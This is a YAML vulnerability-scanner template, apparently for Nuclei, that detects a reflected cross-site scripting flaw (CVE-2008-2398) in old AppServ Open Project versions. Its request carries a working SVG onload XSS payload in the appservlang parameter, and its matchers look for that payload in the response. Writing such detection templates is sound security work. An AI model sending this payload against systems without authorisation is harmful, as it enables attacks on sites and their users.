50 lines
1.8 KiB
YAML
50 lines
1.8 KiB
YAML
id: CVE-2008-2398
|
|
|
|
info:
|
|
name: AppServ Open Project <=2.5.10 - Cross-Site Scripting
|
|
author: unstabl3
|
|
severity: medium
|
|
description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
|
|
remediation: |
|
|
Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor.
|
|
reference:
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
|
- http://securityreason.com/securityalert/3896
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-2398
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2008-2398
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00329
|
|
epss-percentile: 0.67909
|
|
cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: appserv_open_project
|
|
product: appserv
|
|
tags: cve2008,cve,xss,appserv_open_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<svg/onload=confirm('xss')>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100e5f69285583054049dc882b6007c931a7249001e67d2592ec4dbab04b3e63d0b022036b288a25c5ddf0370be06576e1ee68cb3e76729998201373b7d00e187422cd6:922c64590222798bb761d5b6d8e72950 |